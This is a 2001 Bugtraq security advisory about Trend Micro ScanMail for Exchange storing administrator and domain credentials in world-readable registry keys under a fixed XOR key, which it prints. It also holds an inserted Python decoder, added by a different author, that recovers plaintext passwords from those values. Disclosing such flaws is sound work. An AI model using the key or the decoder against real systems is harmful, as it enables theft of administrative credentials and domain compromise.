[19962] in bugtraq
STAT Security Advisory: Trend Micro's ScanMail for Exchange store
daemon@ATHENA.MIT.EDU (Maucher, Jon)
Sat Mar 31 19:17:30 2001
Message-ID: <BFE302C4DFC0D11195C000805F19DC4D798AF3@corpmx4.ess.harris.com>
Date: Fri, 30 Mar 2001 14:50:33 -0500
Reply-To: "Maucher, Jon" <jmaucher@HARRIS.COM>
From: "Maucher, Jon" <jmaucher@HARRIS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
==================================================================================
STAT Security Advisory
http://www.statonline.com/
Software Vendor: Trend Micro (www.antivirus.com)
Software Package: ScanMail for Exchange
Versions Affected: 3.5 Evaluation (possibly others)
Synopsis: Account names and passwords stored unprotected in registry
Issue Date: March 30, 2001
Vendor Response: Vendor notified March 1, 2001
Solution received March 5, 2001
Vendor fix notification received March 29, 2001
==================================================================================
1. Summary
Trend Micro's ScanMail for Exchange (version 3.5) stores the credentials of users
in the system registry with no protection. These credentials apply to the NT
domain, and include a valid NT domain or system username, the NT domain name, and
password. This occurs in at least two places, once when the product is installed
and once for use by the Management Console. Since both installation and management
require administrative privileges, the administrative account for the system or
for the entire domain can be compromised.
2. Problem Description
Several registry values are created during installation and during use
of the product's Management Console to store the credentials of the
last user to log on. These credentials are valid at least on the server,
and possibly valid on the entire domain depending on the last user to log in.
Additionally, these keys are created with Everyone set to Special Access, which
includes Read access to the values, so any local user can read them. The usernames
and passwords are rolled right a number of characters and then XOR'ed with a
constant 14-byte key (0xB15A0E707EEDEB80F70FB78F1399).
For example, if the Administrator password is "test", then one of the following
values would be stored (the same four XOR'ed bytes in four different rotations):
C53F7D04
-or-
3F7D04C5
-or-
7D04C53F
-or-
04C53F7D
The result is a possible administrative compromise of a system (or quite possibly
an entire domain).
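The following is an added example, not code from STAT, Harris Corporation or Trend Micro, showing how little the XOR-and-rotate scheme protects a value once the registry key is readable. It assumes what the four sample values above imply: the plaintext is XOR'ed byte-for-byte with the constant key (cycling the key for values longer than 14 bytes, an assumption), and the XOR'ed bytes are then rotated right by an unknown number of positions. Since a reader of the registry does not know the rotation, the decoder simply tries every rotation and keeps the candidates that decode to printable text. The sample inputs are constructed from the advisory's own "test" values; the domain account name in the usage note is made up.

```python
"""Decode a ScanMail-style obfuscated registry credential.

Added example for this advisory; not code from STAT, Harris or Trend Micro.
Assumed scheme: stored = rotate_right(plaintext XOR KEY, shift), with KEY
repeated for plaintexts longer than 14 bytes (assumption) and shift unknown.
"""

# Constant key quoted in the advisory, 14 bytes.
KEY = bytes.fromhex("B15A0E707EEDEB80F70FB78F1399")


def xor_with_key(data: bytes) -> bytes:
    """XOR each byte with the key; cycling the key past 14 bytes is an assumption."""
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(data))


def rotate_right(data: bytes, n: int) -> bytes:
    """Rotate a byte string right by n positions (negative n rotates left)."""
    if not data:
        return data
    n %= len(data)
    return data[-n:] + data[:-n] if n else data


def obfuscate(plaintext: str, shift: int) -> str:
    """Build the hex string as it would appear in the registry for a given shift."""
    raw = plaintext.encode("latin-1")  # charset assumed from the mail headers
    return rotate_right(xor_with_key(raw), shift).hex().upper()


def _looks_like_text(b: bytes) -> bool:
    """Accept only printable ASCII; a wrong rotation almost always yields high bytes."""
    return bool(b) and all(0x20 <= c < 0x7F for c in b)


def deobfuscate(stored_hex: str) -> list:
    """Try every rotation, undo it, XOR with the key, and return (shift, plaintext)
    for each candidate that decodes to printable text. The shift is unknown to
    whoever reads the registry, so all are tried; for short values only the
    correct rotation survives the printable check."""
    data = bytes.fromhex(stored_hex)
    found = []
    for shift in range(len(data)):
        candidate = xor_with_key(rotate_right(data, -shift))
        if _looks_like_text(candidate):
            found.append((shift, candidate.decode("latin-1")))
    return found


if __name__ == "__main__":
    # Constructed input: the advisory's own sample values for the password "test".
    for stored in ("C53F7D04", "3F7D04C5", "7D04C53F", "04C53F7D"):
        print(stored, "->", deobfuscate(stored))
    # A made-up domain account name longer than the key, to exercise key cycling.
    stored = obfuscate("CORP\\Administrator", 5)
    print(stored, "->", deobfuscate(stored))
```

Each of the four advisory values decodes to "test" with exactly one rotation; for longer values the printable filter may leave more than one candidate, which is why the function returns a list rather than a single string. Note that the key itself is recovered trivially from any known value: one XOR of the stored bytes against a known password yields the key bytes, so this is obfuscation, not encryption.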
3. Solution
Trend Micro recommends, as a temporary fix, that the following keys (and all
sub-keys) should have their permissions set to Full Control for Administrators
and SYSTEM (remove all other permissions):
HKLM\Software\TrendMicro\ScanMail for Exchange\RemoteManagement
HKLM\Software\TrendMicro\ScanMail for Exchange\UserInfo
The vendor is implementing a new encryption method that will be
available in version 5.1 of ScanMail for Exchange.
4. Credits
This vulnerability was discovered and researched by Jon Maucher
and Bill Wall of Harris Corporation.